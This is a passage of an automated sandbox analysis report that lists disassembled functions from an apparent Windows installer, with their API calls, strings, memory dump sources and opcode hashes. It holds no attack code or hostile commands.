                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last
                                                                                              • String ID: DW\DW20.exe$Failed to record SetupFlags
                                                                                              • API String ID: 685212868-3543485478
                                                                                              • Opcode ID: 6780a64aa2ead81c2085ee10872f2c246aabbaa58b907b729eb86a9cbd179cfe
                                                                                              • Instruction ID: 635f24dcd7d1235f6bd7f76f4aacad12e1cc2c040ee1c6c6b52d46fdb42bba25
                                                                                              • Opcode Fuzzy Hash: 6780a64aa2ead81c2085ee10872f2c246aabbaa58b907b729eb86a9cbd179cfe
                                                                                              • Instruction Fuzzy Hash: 6341E431900209DFCB10DFB8C945ADEBBB5BF25318F158A65E410EBB81C774DA0AD7A5
                                                                                              Function 6C903439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C903440
                                                                                              • PathStripToRootW.SHLWAPI(00000000,C600000B,6C8FFA6E,00000010,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C9034D8
                                                                                              • GetLastError.KERNEL32(?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90350D
                                                                                              Strings
                                                                                              • Failed to record SystemMemory, xrefs: 6C903527
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3LastPathRootStrip
                                                                                              • String ID: Failed to record SystemMemory
                                                                                              • API String ID: 1831876552-335854511
                                                                                              • Opcode ID: 5ddb44ec142fe5934dbe288ca7d194683411a0f831b9faf469f7e165439a4073
                                                                                              • Instruction ID: 07688e7fa373c0a73d2a346b377d8cbc0eb7a406570023f53e39568780420d9a
                                                                                              • Opcode Fuzzy Hash: 5ddb44ec142fe5934dbe288ca7d194683411a0f831b9faf469f7e165439a4073
                                                                                              • Instruction Fuzzy Hash: 3C31B371A1021A9BCB04DFB4CD499EEBB79BF25318F110658E514E7B90CB34D909DBA0
                                                                                              Function 6C8F7C9E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7CA5
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C391D: __EH_prolog3.LIBCMT ref: 6C8C3924
                                                                                                • Part of subcall function 6C8C395E: __EH_prolog3.LIBCMT ref: 6C8C3965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Package Name = %s$Package Version = %s$Package details
                                                                                              • API String ID: 431132790-2412997842
                                                                                              • Opcode ID: 2bd87f53008b3e0f93ac5ebce17468dd7124cbb3c212bdf624132e286f25f002
                                                                                              • Instruction ID: 6c049c4e29ba3f153cefc59900da6d6b61da95782ec70bfe179cff96c4c8a29c
                                                                                              • Opcode Fuzzy Hash: 2bd87f53008b3e0f93ac5ebce17468dd7124cbb3c212bdf624132e286f25f002
                                                                                              • Instruction Fuzzy Hash: 0231AE7190414DEFCF10CBA8C945BEDBBB5AF25308F144554E110BBB90C774EA19DBA5
                                                                                              Function 6C8C712B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7132
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,00000010), ref: 6C8C7191
                                                                                              • #195.MSI(00000010,00000000,00000104,00000000,00000000,00000104,00000010,MSI.dll), ref: 6C8C7200
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: #195FolderH_prolog3Path
                                                                                              • String ID: MSI.dll
                                                                                              • API String ID: 2462876523-3845536143
                                                                                              • Opcode ID: b0511c1c73548a44b223eb3c0e5f4e413607314e0834cd16f438b7871ef7925c
                                                                                              • Instruction ID: 8e7bc0b584e9036366507451649eb371e0e527f307e64ef5e237c9b9c63a943c
                                                                                              • Opcode Fuzzy Hash: b0511c1c73548a44b223eb3c0e5f4e413607314e0834cd16f438b7871ef7925c
                                                                                              • Instruction Fuzzy Hash: DA31AF70A10209DFDF04DFA8C889AFEBBB5BF24318F154559E410ABB80C774DA09DBA4
                                                                                              Function 6C8FF821 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8F76A7: __EH_prolog3.LIBCMT ref: 6C8F76AE
                                                                                                • Part of subcall function 6C8F76A7: GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C8FF845,?), ref: 6C8F7748
                                                                                                • Part of subcall function 6C8F76A7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C8F7758
                                                                                                • Part of subcall function 6C8F76A7: SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C8F776D
                                                                                                • Part of subcall function 6C8F76A7: SetUnhandledExceptionFilter.KERNEL32(6C90416A), ref: 6C8F7774
                                                                                                • Part of subcall function 6C8F76A7: GetCommandLineW.KERNEL32 ref: 6C8F777A
                                                                                              • _memset.LIBCMT ref: 6C8FF85B
                                                                                              • GetEnvironmentVariableW.KERNEL32(DebugIronMan,?,000000FF,?,?,?), ref: 6C8FF874
                                                                                              • DebugBreak.KERNEL32(?,?,?), ref: 6C8FF8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressBreakCommandDebugEnvironmentExceptionFilterGuaranteeH_prolog3HandleLineModuleProcStackThreadUnhandledVariable_memset
                                                                                              • String ID: DebugIronMan
                                                                                              • API String ID: 12115070-628588297
                                                                                              • Opcode ID: 284e52822a8ddb406e0fb8edeff3c3a97228731d5a314e4cbd7d1e9b7a3f9351
                                                                                              • Instruction ID: 8ae5b75183a639556ca535465ad41cdae1f353a2511652864626f0d6cfe7efa5
                                                                                              • Opcode Fuzzy Hash: 284e52822a8ddb406e0fb8edeff3c3a97228731d5a314e4cbd7d1e9b7a3f9351
                                                                                              • Instruction Fuzzy Hash: 9811087161021EAAE720EF748A09ADBB3F4EF14758F404964D525D7B41F730DA46C740
                                                                                              Function 6C5D2815 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,/3]l,00000000,00000000,00000000,00000000,00000000,?,?,6C5D36C7,?,00000001), ref: 6C5D2835
                                                                                              • GetLastError.KERNEL32(?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D283B
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D2863
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationToken$ErrorLastmalloc
                                                                                              • String ID: /3]l
                                                                                              • API String ID: 3066823155-3022599639
                                                                                              • Opcode ID: 3f30c1d183c8c34c7afc358f55d2860901d5b358a527f229fea13f076ce6c0d4
                                                                                              • Instruction ID: a1ccc9fdee657480bc4d46c00b7d7f3c3b8e01598af8d4ce696c2ac89089dd35
                                                                                              • Opcode Fuzzy Hash: 3f30c1d183c8c34c7afc358f55d2860901d5b358a527f229fea13f076ce6c0d4
                                                                                              • Instruction Fuzzy Hash: D801AD32601309FAEF009AA98C44F9E7B68EB053A9F214021F900B2450D731FE44A768
                                                                                              Function 63960E5C Relevance: 6.1, APIs: 4, Instructions: 100windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63960EC4
                                                                                                • Part of subcall function 639691B7: _malloc.LIBCMT ref: 639691D1
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 63960F1D
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 63960F27
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,00000000), ref: 63960F2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DialogRectShowWindow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 929715566-0
                                                                                              • Opcode ID: f5024eadc1f6f761cdba2dbc2135efcb1b0d4016129ab17a16a61073108b770c
                                                                                              • Instruction ID: 0d7de4c62c8a87d3d48e72a2395a43ae96137363862fb53015b1183e517ea210
                                                                                              • Opcode Fuzzy Hash: f5024eadc1f6f761cdba2dbc2135efcb1b0d4016129ab17a16a61073108b770c
                                                                                              • Instruction Fuzzy Hash: A7316935A00219AFDB159F68C889AAEBFF5FF89750F104019F605EB3A0DB759901CF91
                                                                                              Function 6C5D3D03 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D3D28
                                                                                                • Part of subcall function 6C5D182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C5D2E5E,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D1897
                                                                                                • Part of subcall function 6C5D182C: RegQueryValueExW.KERNEL32(6C5D2E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D18B3
                                                                                                • Part of subcall function 6C5D182C: RegCloseKey.KERNEL32(6C5D2E5E,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D18D1
                                                                                              • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,UserId,?,00000027), ref: 6C5D3D74
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                                                              • String ID: Software\Microsoft\SQMClient$UserId
                                                                                              • API String ID: 895213837-3032788761
                                                                                              • Opcode ID: 63ad1620175bec44a50607252ace21114a49d6491865a1716d617bd414b08ca0
                                                                                              • Instruction ID: 397ea1476cb378f4787c2d273b0af6f61c4f488a6dbd51e7ad75071268d31115
                                                                                              • Opcode Fuzzy Hash: 63ad1620175bec44a50607252ace21114a49d6491865a1716d617bd414b08ca0
                                                                                              • Instruction Fuzzy Hash: 1D210575201344AADB00EF98DC84E9F7BB9AB85388F560425E5129B951C3B1ED488B8C
                                                                                              Function 6C5D2E0F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D2E34
                                                                                                • Part of subcall function 6C5D182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C5D2E5E,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D1897
                                                                                                • Part of subcall function 6C5D182C: RegQueryValueExW.KERNEL32(6C5D2E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D18B3
                                                                                                • Part of subcall function 6C5D182C: RegCloseKey.KERNEL32(6C5D2E5E,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D18D1
                                                                                              • SetLastError.KERNEL32(00000000,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D2E80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                                                              • String ID: MachineId$Software\Microsoft\SQMClient
                                                                                              • API String ID: 895213837-1718750536
                                                                                              • Opcode ID: f3de60e408485a4b1d377901b59e24fe0e95dcdd8f8145a77e68e713e1cc8ec8
                                                                                              • Instruction ID: 2a1824bd7d7ad0392df684a13ae2fe4ace265eeca136a805e20c3e6e8dbb967b
                                                                                              • Opcode Fuzzy Hash: f3de60e408485a4b1d377901b59e24fe0e95dcdd8f8145a77e68e713e1cc8ec8
                                                                                              • Instruction Fuzzy Hash: C4210831200344ABD700DE9C9CC4FAFB7A9EB85348F570429E515DB951C7B1ED888B99
                                                                                              Function 6396D763 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 6396D771
                                                                                                • Part of subcall function 63968FCB: __FF_MSGBANNER.LIBCMT ref: 63968FE4
                                                                                                • Part of subcall function 63968FCB: __NMSG_WRITE.LIBCMT ref: 63968FEB
                                                                                                • Part of subcall function 63968FCB: HeapAlloc.KERNEL32(00000000,00000001,00000000,?,?,?,639691D6,?), ref: 63969010
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocHeap_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 3293231637-0
                                                                                              • Opcode ID: f95259730f2e1bece1798d84181a20776c0a7f8a0892d4db980c4806e8365ea6
                                                                                              • Instruction ID: 9b87bf95017493f569bd87c2fe5d95138b41cd19cb3ac4f1140366bf6e6ac307
                                                                                              • Opcode Fuzzy Hash: f95259730f2e1bece1798d84181a20776c0a7f8a0892d4db980c4806e8365ea6
                                                                                              • Instruction Fuzzy Hash: AB11987294F315AEFB112B7D981468A3BA8DF57BE4B340525F8689A350EB30C9408ED1
                                                                                              Function 6C5D3679 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C5D332F,?), ref: 6C5D3683
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C5D332F,?), ref: 6C5D36B3
                                                                                                • Part of subcall function 6C5D2815: GetTokenInformation.KERNELBASE(?,/3]l,00000000,00000000,00000000,00000000,00000000,?,?,6C5D36C7,?,00000001), ref: 6C5D2835
                                                                                                • Part of subcall function 6C5D2815: GetLastError.KERNEL32(?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D283B
                                                                                                • Part of subcall function 6C5D2815: GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D2863
                                                                                              • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C5D36D5
                                                                                              • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D36E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                              • String ID:
                                                                                              • API String ID: 995526605-0
                                                                                              • Opcode ID: 4111eaacdedf11bdbe9144741265b75b8b70bb3c1e0266a862673884ce9bcdeb
                                                                                              • Instruction ID: e164820ef77e6b872f8746b6155904ba27f1a1c5b0571112042608e3f9d20c9b
                                                                                              • Opcode Fuzzy Hash: 4111eaacdedf11bdbe9144741265b75b8b70bb3c1e0266a862673884ce9bcdeb
                                                                                              • Instruction Fuzzy Hash: 97119D31602354EBDB009F69CC85E9E7BB8EB453E8F224068F410AB650CB71ED50DB58
                                                                                              Function 6C91C0AA Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C91BFB3: __FF_MSGBANNER.LIBCMT ref: 6C91BFCC
                                                                                                • Part of subcall function 6C91BFB3: __NMSG_WRITE.LIBCMT ref: 6C91BFD3
                                                                                                • Part of subcall function 6C91BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C8F831D,00000000,?,6C91C0C9,6C8FF845,00000C00,00000020,6C8FF845,?), ref: 6C91BFF8
                                                                                              • std::exception::exception.LIBCMT ref: 6C91C0F9
                                                                                              • std::exception::exception.LIBCMT ref: 6C91C113
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C91C124
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 615853336-0
                                                                                              • Opcode ID: 8acfc5912aaf4ff7e28ae540b85b33fb7ce4f42836e51216a94eb7f220260658
                                                                                              • Instruction ID: 601d17cf2ae8c5476cae4c9ca91f65709d99fe911cede1724dbfa69d90424f7e
                                                                                              • Opcode Fuzzy Hash: 8acfc5912aaf4ff7e28ae540b85b33fb7ce4f42836e51216a94eb7f220260658
                                                                                              • Instruction Fuzzy Hash: 84F0287151824DABCF00EF98C942BDD3AB9AB6231CF640055E824D6ED0CB71CF198751
                                                                                              Function 6C8C54FB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C8C5562
                                                                                                • Part of subcall function 6C8C4FAC: _memset.LIBCMT ref: 6C8C4FB4
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3InfoSystem_memset
                                                                                              • String ID: %s - %s %s %s$Unknown OS
                                                                                              • API String ID: 3853411852-1218788732
                                                                                              • Opcode ID: dba88714ad2ac0958596af956b4458a067e86bc4897750bd3b3c2ac5c52e070a
                                                                                              • Instruction ID: f91810507fefed2d705fb0cf9e4cdd9c7262b11acd32d5f986a70e2d95193caa
                                                                                              • Opcode Fuzzy Hash: dba88714ad2ac0958596af956b4458a067e86bc4897750bd3b3c2ac5c52e070a
                                                                                              • Instruction Fuzzy Hash: 954160722083459FDB20CF68C841ACBBBE5AF99718F140E1EF49497791DB30E6498B97
                                                                                              Function 6C8D4397 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D439E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA5D0: __EH_prolog3.LIBCMT ref: 6C8CA5D7
                                                                                                • Part of subcall function 6C8CA5D0: SysFreeString.OLEAUT32(?), ref: 6C8CA62B
                                                                                                • Part of subcall function 6C8F8863: _wcschr.LIBCMT ref: 6C8F887A
                                                                                                • Part of subcall function 6C8D44EA: __EH_prolog3.LIBCMT ref: 6C8D44F1
                                                                                                • Part of subcall function 6C8D44EA: __CxxThrowException@8.LIBCMT ref: 6C8D45E9
                                                                                                • Part of subcall function 6C8D4613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D468D
                                                                                                • Part of subcall function 6C8D4613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D469E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Close$Exception@8FreeStringThrow_wcschr
